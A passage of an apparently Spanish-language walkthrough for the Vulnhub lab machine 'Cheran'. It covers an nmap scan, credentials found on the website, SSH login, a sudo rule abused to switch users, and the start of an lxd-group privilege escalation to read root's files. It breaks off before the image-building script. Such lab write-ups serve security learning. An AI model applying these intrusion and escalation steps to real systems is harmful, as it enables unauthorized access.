Hoy vamos a hackear la maquina de Vulnhub llamada
Cheran. Podeis descargarla desde el siguiente enlace:
Cheran
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.35
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 11:28 CEST
Nmap scan report for 192.168.1.35
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 2048 38:20:1e:42:7a:d6:a9:2a:01:62:58:f3:b6:37:d8:41 (RSA)
| 256 e8:c1:5a:14:7a:c6:09:24:b6:0a:c0:05:e4:82:03:d9 (ECDSA)
|_ 256 91:b9:e9:b9:e7:83:7a:28:71:48:c4:58:9b:39:7b:a1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC:
(unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2020-09-08T14:59:23+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-08 11:29:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
http://192.168.1.35/robots.txt
/*
/users
/youtube
Si visitamos http://192.168.1.35/users.txt vemos que nos
aparece "Rajasimha", el cual como el nombre del fichero indica
puede ser el user.
Por otro lado, si visitamos http://192.168.1.35/youtube/youtube.html
aparecen una lista de enlaces a videos de Youtube.
Si hacemos clic en el 4 enlace empezando por abajo podemos ver al final
de la descripcion del video:
Password : k4rur
Teniendo ya el user/password tratamos de loguearnos por SSH.
Low Shell
~ > ssh Rajasimha@192.168.1.35
Rajasimha@192.168.1.35's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Sep 8 15:06:41 IST 2020
System load: 0.04 Processes: 97
Usage of /: 25.4% of 9.78GB Users logged in: 0
Memory usage: 33% IP address for enp0s3: 192.168.1.35
Swap usage: 0%
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$
Miramos si podemos hacer algo con sudo.
Rajasimha@ubuntu:/tmp$ sudo -l
[sudo] password for Rajasimha:
Matching Defaults entries for Rajasimha on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin
User Rajasimha may run the following commands on ubuntu:
(ALL, !root) /bin/bash
Vemos que podemos usar sudo para obtener una shell con los privilegios de
"cheran".
Como "cheran" vemos que estamos dentro del grupo lxd, asi que vamos
a usar lxd para leer la flag de root, montando el FS en un container, y
accediendo desde dentro del container a la carpeta de root del host.
Empezamos inicializando lxd.
cheran@ubuntu:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto†or
“noneâ€) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto†or
“noneâ€) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no)
[default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
cheran@ubuntu:~$
En los siguientes pasos, es necesario que el usuario "cheran" tenga
acceso a un fichero del directorio del home de Rajasimha para poder
importar el container y usar lxc, para ello como usuario
Rajasimha, ejecutamos el siguiente comando para hacer accesible
todo lo que haya en su home a todo el mundo.
Rajasimha@ubuntu:/home$ chmod -R 777 Rajasimha/
Vamos a seguir los pasos indicados en[1]
para hacer usar lxd.
En nuestra maquina nos descargamos el siguiente script
que nos preparara una imagen.